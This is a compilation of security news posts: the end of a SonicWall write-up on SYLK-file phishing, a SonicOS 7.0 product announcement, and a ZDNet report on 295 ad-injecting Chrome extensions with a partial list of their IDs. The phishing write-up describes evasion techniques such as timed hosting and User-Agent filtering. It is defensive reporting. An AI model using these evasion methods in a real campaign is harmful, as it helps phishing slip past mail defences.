In addition to enabling the URL only after delivery, the server would become inactive a few hours later, rejecting further queries. This seems to be a way to avoid action from their provider, as the reported content is no longer available at the links associated with the attack by the time a manual take-down notice is requested.

The coordinated timing of the hosting servers with the sending of the emails is characteristic of a more sophisticated campaign. When combined with the high-profile nature of the targeted organizations, it suggests an APT group or state actor.

The hosting server only responded to requests from “Windows Installer” agents

In addition to their on-and-off timing, the hosting servers utilized another common technique to avoid analysis, rejecting all queries except for those with User Agent: Windows Installer. This ensured that it only responded to the malicious script and would avoid detection by URL analysis tools.

How did it evade Microsoft protection?

Each of the obfuscation methodologies were designed to bypass a specific layer of the Microsoft 365 security infrastructure. While we understand how each was used in turn, we are still confused as to how ATP fails to detect this technique in emulation. Creating a batch file and calling the msiexec application is considered malicious, even if it fails to run. We must assume, then, that none of these files are being tested by the sandbox layer. Unfortunately, because each file is unique, no two attachments have the same MD5 hash, which requires each file to be given additional scrutiny.

Got SonicWall CAS protecting your inbox? Don’t worry, we have you protected.

If you have SonicWall Cloud App Security protecting your organization’s inbox and you are running in Protect (Inline) mode, this attack is blocked, and users will not see these attacks in their inbox. (If you are in Monitor Mode, we recommend that you move to Protect (Inline) mode.)

Alternatively, we recommend you configure your Office 365 account to reject files of this type. SLK files are relatively rare, so unless you have a legacy reason to allow them, we recommend excluding the SLK extension as a static mail-flow rule, at least until Microsoft fixes this gap.

Microsoft’s recommendations are much more complicated but are another alternative to protect the desktop.

Source :
https://blog.sonicwall.com/en-us/2020/08/protect-against-sylkin-attack-with-sonicwall-cloud-app-security/

New SonicWall SonicOSX 7.0 and SonicOS 7.0 Operating Systems Offer Visibility and Simplicity

Businesses are embracing digital transformation, bringing about a new era of the anytime, anywhere business. Staffed by flexible employees and built on the principle of a distributed enterprise, the resulting proliferation of applications and data presents organizations with a major security challenge.

As enterprises grow, they must proactively manage security across several different locations: at headquarters, at software-defined branches (SD-Branches), at co-located data centers or in a variety of cloud locations. These locations are not siloed — applications and data move dynamically between them, forcing security to follow.

SonicWall physical and virtual firewalls provide high-performance security across a wide range of enterprises, but protecting all these security vectors requires the ability to consistently apply the right security policy to the right network control point — while keeping in mind that some security failures can be attributed to ineffective policies or misconfigurations.

To ensure effective policy provisioning, enterprises need dynamic visibility across the network. They need a boundless approach to network security policy management.

The SonicOS or SonicOSX architecture is at the core of every SonicWall physical and virtual firewall, including the TZ, NSa, NSv and NSsp Series. Our operating systems leverage our patented, single-pass, low-latency, Reassembly-Free Deep Packet Inspection® (RFDPI) and patent-pending Real-Time Deep Memory Inspection™ (RTDMI) technologies to deliver industry-validated high security effectiveness, Secure SD-WAN, real-time visualization, high-speed virtual private networking (VPN) and other robust security features.

The latest TZ570/670 Series firewalls run on the brand-new SonicOS 7.0, which features advanced security, simplified policy management, and critical networking and management capabilities — all designed to meet the needs of distributed enterprises with next-gen SD-Branches and small- to medium-sized businesses.

With the introduction of the brand-new SonicOSX 7.0 and SonicOS 7.0, the SonicOS operating system is setting a new standard for usability. Built from the ground up, SonicOSX 7.0 architecture features Unified Policy management, which offers integrated management of various security policies for enterprise-grade firewalls such as SonicWall NSsp and NSv firewall series.

This OS upgrade brings about multi-instance support on NSsp series firewalls. Multi-instance is the next generation of multi-tenancy, where each tenant is isolated with dedicated compute resources to avoid resource starvation.

SonicOSX 7 also provides unified policy to provision L3 to L7 controls in a single rule base on every firewall, providing admins a centralized location for configuring policies. It comes with a new web interface born from a radically different approach: a user-first design emphasis. SonicOSX’s web-based interface presents meaningful visualizations of threat information, and displays actionable alerts prompting you to configure contextual security policies with point-and-click simplicity.

In addition to being more user friendly, the new interface is also more attractive than the classic version. In a single-pane view of a firewall, the interface presents the user with information on the effectiveness of various security rules. The user is then able to modify the predefined rules for gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, and deep-packet inspection of encrypted traffic in a seamless fashion. With Unified Policy, SonicWall delivers a more streamlined experience that reduces configuration errors and deployment time for a better overall security posture.

The Unified Policy gives your organization the ability to control dynamic traffic passing through a firewall and provides visibility and insight into the disparate policies that affect gateway antivirus, antispyware, content filtering, intrusion prevention, geo-IP filtering, deep-packet inspection of encrypted traffic and more. It helps simplify management tasks, reduce configuration errors and speed up deployment time, which all contribute to a better overall security posture.

To learn more, visit www.sonicwall.com/sonicos

Source :
https://blog.sonicwall.com/en-us/2020/08/new-sonicwall-sonicosx-7-0-and-sonicos-7-0-offer-visibility-and-simplicity/

Cluster of 295 Chrome extensions caught hijacking Google and Bing search results

More than 80 million Chrome users have installed one of 295 Chrome extensions that hijack and insert ads inside Google and Bing search results.

The malicious extensions were discovered by AdGuard, a company that provides ad-blocking solutions, while the company’s staff was looking into a series of fake ad-blocking extensions that were available on the official Chrome Web Store.

A subsequent investigation into the fake ad blockers unearthed a larger group of malicious activity spreading across 295 extensions.

Besides fake ad blockers, AdGuard said it also found extensions posing as weather forecast widgets and screenshot capture utilities.

However, the vast majority of the malicious extensions (245 out of the 295 extensions) were simplistic utilities that had no other function than to apply a custom background for Chrome’s “new tab” page.

In a technical analysis shared with ZDNet, AdGuard said all extensions loaded malicious code from the fly-analytics.com domain, and then proceeded to quietly inject ads inside Google and Bing search results.

Almost all the 295 extensions were still available on the official Chrome Web Store earlier today, when we received the list from AdGuard.https://platform.twitter.com/embed/index.html?creatorScreenName=ZDNet&dnt=false&embedId=twitter-widget-0&frame=false&hideCard=false&hideThread=false&id=1290674805365264386&lang=en&origin=https%3A%2F%2Fwww.zdnet.com%2Farticle%2Fcluster-of-295-chrome-extensions-caught-hijacking-google-and-bing-search-results%2F&siteScreenName=ZDNet&theme=light&widgetsVersion=223fc1c4%3A1596143124634&width=550px

Extensions started being pulled down from the store after we reached out to Google’s Web Store team and after AdGuard published a blog post detailing their findings.

The same blog post also details additional bad practices on the Chrome Web Store, such as store moderators allowing a large number of copycat extensions to clone popular add-ons, capitalize on their brands, reach millions of users, while also containing malicious code that performs ad fraud or cookie stuffing.

The full list of 295 ad-injecting extensions is available below, at the end of this article.

When Google removes an extension from the Chrome Web Store for malicious activity, the extension is also disabled in users’ browsers and marked as “malware” in Chrome’s Extension section.

Users still have to manually uninstall it from their browsers.

Format: [extension ID] [extension name]

  1. flbcjbhgomclbhlchggbmnpekhfeacim, “ScreenShot & Screen Capture Elite”
  2. aadmpgppfacognoeobmheghfiibdplcf, “Kawaii Wallpaper HD Custom New Tab”
  3. abgfholnofpihncfdmombecmohpkojdb, “Shadow Of The Tomb Raider Wallpaper New Tab”
  4. aciloeifdphkogbpagikkpiecbjkmedn, “Kpop SHINee Wallpapers HD New Tab”
  5. acmgemnaochmalgkipbamjddcplkdmjm, “Tokyo Ghoul Wallpaper HD Custom New Tab”
  6. addpbbembilhmnkjpenjgcgmihlcofja, “Mega Man Wallpaper HD Custom New Tab”
  7. adfjcmhegakkhojnallobfjbhenbkopj, “Weather forecast for Chrome™”
  8. aeklcpmgaadjpglhjmcidlekijpnmdhc, “Kpop Blackpink Wallpaper HD Custom New Tab”
  9. afifalglopajkmdkgnphpfkmgpgdngfj, “Kpop Red Velvet HD NewTab Themes”
  10. agldjlpmeladgadoikdbndmeljpmnajl, “Tumblr Wallpapers Wallpaper HD Custom New Tab”
  11. ahmmgfhcokekfofjdndgmkffifklogbo, “season 6 fortnite HD Wallpapers NewTab”
  12. aippaajbmefpjeajhgaahmicdpgepnnm, “Unicorn Wallpaper HD Custom New Tab”
  13. akdpobnbjepjbnjklkkbdafemhnbfldj, “My Hero Academia Wallpaper HD Custom New Tab”
  14. akhiflcfcbnheaofcaflofbmnkmjlnno, “Cs Go Wallpaper HD Custom New Tab”
  15. aklklkifmplgnobmieahildcfbleamdb, “Super Junior Wallpapers Eunhyuk”
  16. alppaffmlaefpmopolgpkgmncopkbbep, “Boku No Hero Academia Wallpaper HD New Tab”
  17. amdnpfcpjglkdfcigaccfgmlmdepdpeo, “D.Gray-man Backgrounds New Tab”
  18. aomepndmhbbklcjcknnhdabaaofahjcj, “Super Cars – Sports Cars Wallpaper HD New Tab”
  19. badbchbijjjadlpjkkhmefaghggjjeha, “Lil Pump HD New Tab”
  20. bbbdfjdplonnggfjjbjhggobffkggnkm, “3D Wallpaper HD Custom New Tab”
  21. bbdldenhkjcoikalkfkgolomdpnncofc, “Snowman & Gingerbread New Tab Constellations”
  22. bcdjcbgogdomoebdcbniaifnacjbglil, “Gucci Tab Themes HD Bape”
  23. bcepmajicjlaoleoljbpaemkfghohmib, “Bulldogs Tab”
  24. bdbablmeheiahecklheciomhmkplcoml, “Kobe Bryant – Black Mamba New Tab Themes HD”
  25. bfeecodfffgkdedfhmgbfindokikafid, “GTA 5 Grand Theft Auto”
  26. bhifimmocncplbnikchffepggmofkake, “Bangtan Boys Wallpaper HD Custom New Tab”
  27. blipiofdiknkllpajgepiiigfmfgnfep, “Aquarium Live Wallpaper HD Custom New Tab”
  28. bmagbmnmkaknlnoohbmobfmlgndijecb, “RM & Jin Tab Wallpapers”
  29. bnecbeikepeloplclngelcgmgdnafhlp, “Akame Ga Kill Wallpapers HD”
  30. bpnmalopmgpilaoikaeafokedkkonhea, “Sports Cars”
  31. cbncogjaakomibjcgdkpdjmlhfcjfojc, “Moving Wallpapers Wallpapers”
  32. ccgmdfdcnpcfmpceggggmnhbolkhlffi, “Christmas Tree Lights NewTab Emoji”
  33. ccmnnlcciddhkdllgfmkojmmmpahdhlp, “Jungkook HD Tab Backgrounds”
  34. cdpmhflbdaoifgkmlhpfkbfgcifchgpn, “CS GO Themes NewTab”
  35. cepgcjakdboolfkcbihdokfjjkeaddin, “One Direction 1D HD NewTab”
  36. cfadfngejcdogjkkdohpkgeodjooogip, “My Hero Academia Wallpaper HD Custom New Tab”
  37. cgdmknakejoaompdmdeddpgmjffnniab, “Suga”
  38. cgodgjmdljiecnbcgdampafcmlgmfmid, “Puppies Wallpaper HD Custom New Tab”
  39. cibigjhoekijbagpgcgpgimebaiocdgm, “Gta V Wallpaper HD Custom New Tab”
  40. cjbdbomgdbdgdlainhobpjnfkoidcond, “Lamborghini Live Wallpaper HD Custom New Tab”
  41. clndgmolhlkchkbiinamamnbibkakiml, “Tokyo Ghoul Wallpaper HD Custom New Tab”
  42. cmbfgkkjfkmmhalhebnhmanbenfghkcm, “Galaxy Wallpaper HD Custom New Tab”
  43. cncepimkmnhgbjmbcgoomegdkdhplihm, “Stargate SG-1 Tab Wallpapers HD”
  44. cnfbbaddndiehkmhdmmngecaofaojaeo, “Rogue One – Star Wars Wallpaper HD New Tab”
  45. codilkcdacpeklilmgjknekfpminaieo, “Bugatti Vs Lamborghini Wallpaper HD New Tab”
  46. dakenmmdlklnjdpdfmdjccpeapmijaad, “Galaxy Space Wallpaper HD Custom New Tab”
  47. dapecdhpbakbfcoijjpdfoffnajhifej, “Avengers Endgame”
  48. dckadbanpeemhkphnnllamgolhbbbebi, “Spiderman HD NewTab Comics”
  49. ddodaoihhhohncjalnjgmgnlfhgckgdj, “Glitter Wallpaper HD Custom New Tab”
  50. dhbhgfiodedkhgocailljbhcfjhplibb, “Super Cars Wallpaper HD Custom New Tab”
  51. dhcnonhheahlocjbbpkbammanpenpfop, “Naruto Wallpaper HD Custom New Tab”
  52. dhgmdjkeagnhamkedcejighocjkkijli, “Cats & Dogs Wallpapers & Cats & Dogs Games”
  53. dinlhhblgeikohhbfkcoeggglbjlanhg, “Riverdale Tab Themes”
  54. djjdjlbigcdjlghdioabbkjhdelmdhai, “Kawaii Wallpaper HD Custom New Tab”
  55. dkcppkdodfegjkeefohjancleioblabi, “Stephen Curry NewTab Wallpapers”
  56. dkfbfgncahnfghoemhmmlfefhpolihom, “Naruto Wallpaper HD Custom New Tab”
  57. dmklpmfpkokephcjdmocddkhilglgajl, “Witcher Backgrounds HD Tab”
  58. dnimnhhaiphlclcocakkfgnnekoggjpl, “Planet Earth Nature Space Art Wallpaper Tab”
  59. doecpeonnonddhfpabfgblijljennlcj, “Galaxy Space Wallpaper HD Custom New Tab”
  60. dofbgmolpdoknlknfjddecnahgjpinpb, “Beagle Wallpapers New Tab”
  61. dppogkehbpnikehcmadgkbimjnmhdnlo, “Blue Exorcist Wallpapers NewTab”
  62. eapceolnilleaiiaapgionibccekkeom, “Boku No Hero Academia Wallpaper HD New Tab”
  63. ecaejcfpngljeinjmahknbemhnddiioe, “Sicario Day Of The Soldado Themes NewTab”
  64. ecgafllkghmmbnhacnpcobibalonhkkj, “StarCraft Themes NewTab”
  65. edfmeionipdoohiagoaefljjhififgnl, “Nike Themes”
  66. edgbooeklapanaclbchdiaekalebmfgb, “Jesus New Tab”
  67. edohegfjelahakooigmnmkmjofcjgofe, “Sword Art Online Wallpaper HD Custom New Tab”
  68. eeeiekjkpbneogggaajnjldadjmclhlo, “Bts Suga”
  69. eejkpejdfojkbklnlnpgpojoidojbhnh, “Hot Rod Wallpapers – Classic Cars Themes”
  70. efckalhlcogbdbfopffmbacghfoelaia, “Anime Wallpaper HD Custom New Tab”
  71. efnaoofiidefjeefpnheopknaciohldg, “Zelda Wallpaper HD Custom New Tab”
  72. egdpmjnldpefdaiekiapjkanabfiaodp, “Anime Wallpaper HD Custom New Tab”
  73. egicjjdcjhfdnejimnhngogjmoajffpm, “Video Downloader and MP3 converter Pro”
  74. ejcefeinlmdmpnohebfckmodhdkhlgmk, “Danganronpa Wallpapers”
  75. ejighbgeedkpcambhfkohdalcgckdein, “Adblocker for YouTube – Youtube Adblocker”
  76. empoeejllbcgpkmghimibnapemegnihf, “Cristiano Ronaldo Wallpapers”
  77. enlaekiichndcbohopenblignipkjaoa, “Auto Replay for YouTube”
  78. enmomapaolnpbaenhilkjhmobpggjcpm, “Anime Wallpaper HD Custom New Tab”
  79. eohabjkmhajbeaejogdikpgapkeigdki, “Bangtan Boys Wallpaper HD Custom New Tab”
  80. eoijplcnfnjgofchhdkkhpfcjkcefgkb, “Minecraft Wallpaper HD Custom New Tab”
  81. facihnceaoboeoembnbmdlecmkpioacc, “Ferrari Wallpaper HD Custom New Tab”
  82. fagaafjhdmoagacggplmbpganjfjjpcf, “Detective Pikachu Wallpaper HD Custom New Tab”
  83. fanonokndfeibplocpeipgfbopkigcce, “Sword Art Online Wallpaper HD Custom New Tab”
  84. faokbgedcfhnfecloigcihpplicdnann, “Japan NewTab”
  85. fcdopghpidfdeglcheccmehiaedgpmkm, “Wreck It Ralph 2 New Tab Themes HD Moana”
  86. fdacngbbemokpkmdkdefkoodndakgejc, “Neon Wolf NewTab”
  87. fdfffeipjpofnkmdkadjcjohdfoeblhk, “Zombies Wallpaper HD Custom New Tab”
  88. ffhamkjhfajcjlnobkogimnhiagohgfg, “Freddy fnaf New Tab Backgrounds”
  89. fjnbjacfigdidgeeommhbdhnojamhpfg, “Boku No Hero Academia Wallpaper HD New Tab”
  90. fjohhelccbogecmolmjemopgackpnmpg, “Portal Wallpapers & Portal Games”
  91. flagaiaajbikpfnnkodcphdcmgefmbcl, “Aquarium Live Wallpaper HD Custom New Tab”
  92. flgfngbiaanimkhjkojnmilfalidpign, “Chicago Cubs Wallpapers Cubs World”
  93. fmngfipkcebejdconcibohjjgfmokhpa, “Spiderman – Into The Spider Verse Themes Man”
  94. fnblapfcdifokdbkpcbhpkajlkgmcjii, “Motivational Quotes Wallpaper HD New Tab”
  95. fpdjcfokkeooncckcolkmmppebjnfhgh, “Kimetsu No Yaiba Wallpaper HD Custom New Tab”
  96. fphafkamioonlcelldogidajbcmmicco, “Galaxy Wallpaper HD Custom New Tab”
  97. fpjbgjpkfcanmdgjpmnnmoekkaahmafg, “Chevrolet Corvette Backgrounds”
  98. fplmpcijomgjmfbjcidbgpjdmhmamlkf, “Thanos Marvel Wallpaper HD Custom New Tab”
  99. gdacidkmmbdpkedejaljplnfhjidomio, “Tokyo Ghoul Wallpaper HD Custom New Tab”
  100. gdoomgeeelkgcmmoibloelbodkpggdle, “Roblox Wallpaper HD Custom New Tab”
  101. geoolholooeeblajdjffdmknpecbkmah, “Pink Wallpaper HD Custom New Tab”
  102. ghfgeefhkkoajgmnopaldgcagohakhmg, “Despicable Me 3 Wallpaper HD Custom New Tab”
  103. ghhanhhegklhcoffmgkdbiekfhmbfbnc, “Supercars Mustang-Lambo-Bugatti-Nissan Tab”
  104. gjkigcdoljdojaaomnadffdhggoobdpc, “Fortnite Live NewTab”
  105. gkjkhpbembbjogoiejpkehohclfoljbp, “Swag HD Tab Wallpapers”
  106. glibnbcgclecomknccifdaglefljfoej, “Nba Youngboy Wallpaper HD Custom New Tab”
  107. gllogphgdmclhfledlcgmdolngohamcl, “Horse Wallpaper HD Custom New Tab”
  108. haagbldencigkgikfekmoaaofambnafp, “Fire Horse Wallpaper HD Custom New Tab”
  109. haglbigaalkckkedjamjibfnklbbodck, “Puppies Wallpaper HD Custom New Tab”
  110. hcgepcgbgnleafnfcepjbekchbdmekfa, “J Hope & V Bts Vhope HD NewTab”
  111. hdbchphkjjidcfidaelcpmonodhhaahp, “Pokemon Go Wallpaper HD Custom New Tab”
  112. hdljgflalglmllbagpacjmkdiggliidk, “Dark Souls Themes NewTab HD”
  113. hdpnlijiblkmokbjljbahhgkpokgpkli, “Fortnite Live Wallpapers New Tab”
  114. heaphjoejcpdagahbnkkloiaicpadomp, “Blade Runner 2049 Wallpaper HD Custom New Tab”
  115. hjfmdhbmpagpfheceengkakdmpncmlif, “Christmas Tree – Rose Gold Themes Frozen”
  116. hjkjkmkoklbhjhlddialffkchddlncjb, “Unicorns Wallpaper HD Custom New Tab”
  117. hjoihkjijjbkiglgeghbokincmidfped, “Harry Potter Wallpaper HD Custom New Tab”
  118. hncokbmdmbmmlkjhoagcpokehopdikhc, “Star Wars Wallpaper HD Custom New Tab”
  119. hnhpnbajfmmopedidmiablkcdnlegkmd, “Sports Cars – Super Cars Wallpaper HD New Tab”
  120. homdfmaeflodjknffbnhagmlhmgmbjac, “Unicorns Wallpaper HD Custom New Tab”
  121. iccagibmclklcmiejfddepgffgkhnnib, “Dragon Ball Z Wallpaper HD Custom New Tab”
  122. idkllmolbaiailjfidkjcidapkddidbg, “Marble Wallpaper HD Custom New Tab”
  123. ifbffcgakkboaffkidggpcjolehhhbfd, “Naruto Wallpaper HD Custom New Tab”
  124. ifdebecchhapkfdbcbhpmjonmbpfpnck, “Roblox Wallpaper HD Custom New Tab”
  125. igbcfkjflkgamnoikcpiljglnmjnkjac, “Bts Wallpaper HD Custom New Tab”
  126. iiblgogamkmdfojoclpdhainbndfpcci, “Motivational Quotes Wallpaper HD New Tab”
  127. inkankpmoblmficechfgfinajifbfkdn, “Fortnite Season 7 Wallpaper HD Custom New Tab”
  128. ioejcipbmdjinhfciojiacdjolkabkmn, “Lamborghini Wallpaper HD Custom New Tab”
  129. iojhbljpppeociniiemjfelmdcgikmep, “BTS Members Themes NewTab”
  130. ipgnnndhgeaclopjgiihppbbfnmkmjcm, “Neon Genesis Evangelion NewTab”
  131. jckaglinbbflgcklfgacjdmgpnccmdng, “Horse Backgrounds HD”
  132. jfocahgaekfaemhfcfefcodphgpinnch, “Fortnite Omega Wallpaper HD Custom New Tab”
  133. jgbkgjepkeklblmlhnpjmnbinmifjenc, “Forntine Skin Wallpaper HD Custom New Tab”
  134. jlbebokeclkofhchdepbojfhmocdlhfl, “Marble Wallpaper HD Custom New Tab”
  135. jlbhkoohfmnikpalgglhpadlbeiobkaa, “Sports Cars – Super Cars Wallpaper HD New Tab”
  136. jmlbnlcodmikhdpbjjdemgaebjgmpooa, “Hetalia Backgrounds HD Tab”
  137. jnmckphflgdpioinbjaeckdajkbgcfgg, “Minecraft Wallpaper HD Custom New Tab”
  138. kcjahchbheejjpdpohgfkaoknhcdjjnh, “Santa Claus Wallpapers & Santa Claus Games”
  139. kdihodbgfndblemlklkllhfjhiidbgih, “Fortnite Wallpaper HD Custom New Tab”
  140. kefmhdhaebhmdeaabcgoaegmgodncebc, “Just Cause 4 Themes New Tab Avalanche”
  141. kicmnilchjfefpceoaiopdpbpkicgjjm, “Galaxy Wallpaper HD Custom New Tab”
  142. kigiheamdfmilbhkfdploghfnndcgkko, “Pokemon Wallpaper HD Custom New Tab”
  143. kjgceeikbnmddoaggelkkpljdabhghkc, “Pokemon Backgrounds HD”
  144. kkeojhapoadcdlmkjlakdbhfkldbbmgi, “Hypebeast Wallpapers HD New Tab”
  145. klblfmpeelmpnadjahhdakiomhaepogb, “Photography Wallpaper HD Custom New Tab”
  146. kmfiklhdkhidbmofjbgmpeaogglkndpe, “Super Junior Wallpapers & Super Junior Games”
  147. knacgnmpceaffedmgegknkfcnejjhdpp, “Logan (Wolverine) Wallpaper HD Custom New Tab”
  148. kppjffaccdlhfeleafnohmfkgimdjmgg, “Darling In The Franxx New Tab HD”
  149. lbbegfjhlhpikmhbdcfcoadegdldmaen, “Snow Man Wallpapers & Snow Man Games”
  150. lbjgbekokephmmfllmpglefmoaihklpn, “Made In Abyss Wallpaper HD Custom New Tab”
  151. lblnngjkgcpplmddebmefokmccpflhip, “Athletes Motivational Quotes Backgrounds”
  152. lcdabcbanafchdlcbdjgngcplnkijala, “Naruto Wallpaper HD Custom New Tab”
  153. lcgjhoonomcmjpbnijfohbdhhjmhjlal, “Minecraft Wallpaper HD Custom New Tab”
  154. ldkienofjncecbbnmhpngiiidekfcdoe, “Bulldogs Themes”
  155. lemhpidjofhodofghkakoglahdafpcbe, “Harry Potter Wallpaper HD Custom New Tab”
  156. lgekbdjboenacbkiabfkkcpjgacmjcdg, “Pokemon Go Wallpaper HD Custom New Tab”
  157. lggmpibegkcnfogpophgnchognofcdgo, “Neon wolf Backgrounds HD”
  158. ljppknljdefmnkckkdjaokhlncbiehgo, “Roblox Wallpaper HD Custom New Tab”
  159. lkdahidfbdadmblpkopllegopldfbhge, “Space Wallpaper HD Custom New Tab”
  160. llngndcpphncgeledehpklbeheadnoan, “3D Wallpaper HD Custom New Tab”
  161. lmmdoemglmnjenhfcjkhgpkgiedcejmn, “Bangtan Boys Wallpaper HD Custom New Tab”
  162. lniooknjghghdjoehegcoinmbhdbhcck, “Superheroes Wallpaper HD Custom New Tab”
  163. makliapgjjpdkkaikobcmdhkfbfcoafk, “3D Wallpaper HD Custom New Tab”
  164. maohnjppabopdhfkholcdkpehdojnpoc, “Aquarium Live Wallpaper HD Custom New Tab”
  165. mcadalidfbmnponoamfdjlahdeheommb, “Roblox And Minecraft Wallpaper HD New Tab”
  166. mcafdholbcjhepgnpfdogaiagjmlfcon, “Sword Art Online Wallpaper HD Custom New Tab”
  167. meioomnaphfjchjidcfnbadkbaaoanok, “Bears Wallpaper HD Custom New Tab”
  168. mjbmelinkhpkmbjnocdklkjpiilpikba, “Fortnite Wallpaper HD Custom New Tab”
  169. mkghdamdheccacmkmnchkaoljoflpoek, “Black Clover Wallpaper HD Custom New Tab”
  170. mkjcnnfcmmniieaidfadidepdgfppfdj, “Star Wars Wallpaper HD Custom New Tab”
  171. mmhaojkmpbmgbkojlagnhmjlfmnaglla, “Doctor Who Wallpaper HD Custom New Tab”
  172. mmlhchoolkdnmnddgmoohigffekjnofo, “Namjin Bts Wallpaper HD Custom New Tab”
  173. mmmapklofkmbcahafjmiogdbmpagimlp, “Hypebeast Dope Supreme Wallpaper HD New Tab”
  174. mngcfgonjbdbdbifcbhmdiddloganbcc, “Fireplace Live Wallpaper HD Custom New Tab”
  175. mnnpffgmgkbdllleeihdgfgleomdhacm, “Satsuriku No Tenshi Wallpaper HD New Tab”
  176. moalaminambcgbljenplldelnhnaikke, “Rocket League Wallpaper HD Custom New Tab”
  177. moljhdcbomchgdffhddpicbokacnbjoj, “Moana Wallpaper HD Custom New Tab”
  178. mpdpjfobafahmgicjmpnfklbphhlacel, “Alfa Romeo Wallpaper HD Custom New Tab”
  179. mpfleoaldoclbjhfkgbmnelkkbolbegl, “Lion Wallpaper HD Custom New Tab”
  180. nafbodmhgaabbfchodpkmpnibgjmeeei, “Super Cars – Sports Cars Wallpaper HD New Tab”
  181. naofchadlleomaipaienfedidkiodamo, “Red Dead Redemption Wallpaper HD New Tab”
  182. nbbeiofjfjmnicfhkfbjdggbclmbaioc, “League Of Legends (Lol) Wallpaper HD New Tab”
  183. nbblafbmmogmlhejjondcclcgbkdmjln, “Dinosaurs Wallpaper HD Custom New Tab”
  184. nbekcbebginchflfegofcjjmojpppnad, “Lilo And Stitch Wallpaper HD Custom New Tab”
  185. nbhjdcacphemibgeamjkmeknfeffgngk, “Ugandan Knuckles Wallpaper HD Custom New Tab”
  186. nchffcpkbehklpbdodlakgdbnkdcnpbi, “Hedgehog Wallpaper HD Custom New Tab”
  187. nckldhnoondmiheikhblobkgcfchcbld, “Blade Runner 2049 Wallpaper HD Custom New Tab”
  188. ncnonnloajjbpdpgnelmlbflmbhlilid, “Vkook Kim Wallpaper HD Custom New Tab”
  189. ncpjlhellnlcjnjmablbaingipdemidh, “Bears Wallpaper HD Custom New Tab”
  190. ndchgkeilnpiefnoagcbnlellpcfmjic, “Death Note Wallpaper HD Custom New Tab”
  191. ndeejbgcbhehjpjmngniokeleedmjmap, “Daredevil Wallpaper HD Custom New Tab”
  192. ndihciopmidkbamcfgpdmojcpalolfgo, “Gucci Wallpaper HD Custom New Tab”
  193. neafafemicnbclhpojeoiemihogeejhl, “Jisung Stray Kids Wallpaper HD Custom New Tab”
  194. nekimocmhfdimckbgchifahcgafhnagb, “Kill La Kill Wallpaper HD Custom New Tab”
  195. nenaiblmmandfgaiifppcegejpinkebl, “One Direction Wallpaper HD Custom New Tab”
  196. neplbnhjlkmpekfcjibdidioejnhejfl, “Chicago Bulls Wallpaper HD Custom New Tab”
  197. nepnhilmahdmejhghfbjhhabaioioeel, “Ant Man & The Wasp Wallpaper HD New Tab”
  198. nfanjklinojeimbhmfliomdihldjhfpm, “Jimin & Jungkook Wallpaper HD Custom New Tab”
  199. nfebelgoldoapjgfkekcmbddpljakakp, “Danganronpa V3 Maki Wallpaper HD New Tab”
  200. nfhbpopnbgigkljgmelpfncnghjpdopf, “Ad-block for YouTube – Youtube Ad-blocker Pro”
  201. nfpnclghflfcgkgdjcbpoljlafndbomk, “Seattle Seahawks Wallpaper HD Custom New Tab”
  202. ngaccohdjpkgnghichikgcpfagnoeeim, “Adidas Wallpaper HD Custom New Tab”
  203. ngajighkghnbfnleddljedblnjaggebo, “Real Madrid Wallpaper HD Custom New Tab”
  204. ngchnhjdpgpkapghgpncmommhelegfbh, “Kpop Nu Est Wallpaper HD Custom New Tab”
  205. ngeofnobniohmdmdkliflkeppfgbjpgn, “Satsuriku No Tenshi Wallpaper HD New Tab”
  206. nglggaejaflihehbajhppedepephbfae, “Kingdom Hearts 3 Wallpaper HD Custom New Tab”
  207. nhnemamgicdjigoedllaicngcfihkmhf, “Voltron Wallpaper HD Custom New Tab”
  208. nhneoegahiihkkgdindfdnobhhhlpfnm, “One Piece Anime Wallpaper HD Custom New Tab”
  209. njablodeioakdgahodegclphmnbaphin, “Fruits Basket Wallpaper HD Custom New Tab”
  210. njdegihoinoiplfpbcckmjahlnpeipii, “Godzilla Wallpaper HD Custom New Tab”
  211. njliieipbkencklladfemkkipmfcjiom, “Dope Wallpaper HD Custom New Tab”
  212. nklckhbegicdajpehmmpbnpelkdjmdoc, “Ikon Wallpaper HD Custom New Tab”
  213. nkopnpaipcceikcmfcjlacgkjoglodag, “Devil May Cry Wallpaper HD Custom New Tab”
  214. nldffbaphciaaophmdnikgkengbmigli, “Final Fantasy Wallpaper HD Custom New Tab”
  215. nmkfcjaghjoedelgkomoifnpdejjpcbj, “Heart Wallpaper HD Custom New Tab”
  216. nmlmdkblidkckbhidgfgghajlkgjijkp, “Hawaii Wallpaper HD Custom New Tab”
  217. nnceiipjfkdobpenbmnajbkdfiklajgl, “Puppies Wallpaper HD Custom New Tab”
  218. noiinnecebffnjggilfhailhhgdilbld, “One Direction – 1D Wallpaper HD New Tab”
  219. nojmjafalbmmoohpmjphalepmfnmhfao, “Vmin Bts Wallpaper HD Custom New Tab”
  220. npcndkopgafkjggoledlgfblodppnckj, “Kill La Kill Wallpaper HD Custom New Tab”
  221. nphiadicgehlpbniemnkhinphngoeaeg, “Red Dead Redemption Wallpaper HD New Tab”
  222. oaihijkoodmmaibfhojdinffpinmhdji, “Attack On Titan Wallpaper HD Custom New Tab”
  223. oanlnaeipdakcmafockfiekhdklfidjb, “Chicago Bulls Wallpaper HD Custom New Tab”
  224. oanplobhgngkpkpeihcdojkongpiheci, “Destiny 2 Wallpaper HD Custom New Tab”
  225. obahibdkmhmnenkcdpakilchcppihopl, “Clash Royale Wallpaper HD Custom New Tab”
  226. obgdpcjbebcaphmigjhogcikejnlbjgl, “Deadpool Wallpaper HD Custom New Tab”
  227. ocfpmgbbkjeblbhdehminjdjffhcidbi, “Dank Memes Wallpaper HD Custom New Tab”
  228. ocgfhclcahimdhfjgmakmfdnhomofljo, “Bts Wallpaper HD Custom New Tab”
  229. ocponkhpfikgnggeflddgkfcmhjejedo, “Chevrolet Corvette Wallpaper HD New Tab”
  230. odoenahafpbigcelejhbkkhnjfleanok, “Lamborghini Super Cars Wallpaper HD New Tab”
  231. oehamnhnpejphgpkgnenefolepinadjj, “Fortnite Drift Wallpaper HD Custom New Tab”
  232. oejbnchocabaoicconfnbjghebmbfemc, “Rocky Paw Mighty Pups Wallpaper HD New Tab”
  233. oejmcobpfiiladgbfpknibppfnekbolo, “Yeezy Wallpaper HD Custom New Tab”
  234. oemkcngaaomgokaclafmkcgcpbfelmnb, “Wild Animals 3D Neon Wallpaper HD New Tab”
  235. ofbfieekadnmifbaoigkcffobkkjblep, “Cherry Blossom Wallpaper HD Custom New Tab”
  236. ofgihclaiecmjbfjnajjimdbjnbiimkk, “Audi R8 Wallpaper HD Custom New Tab”
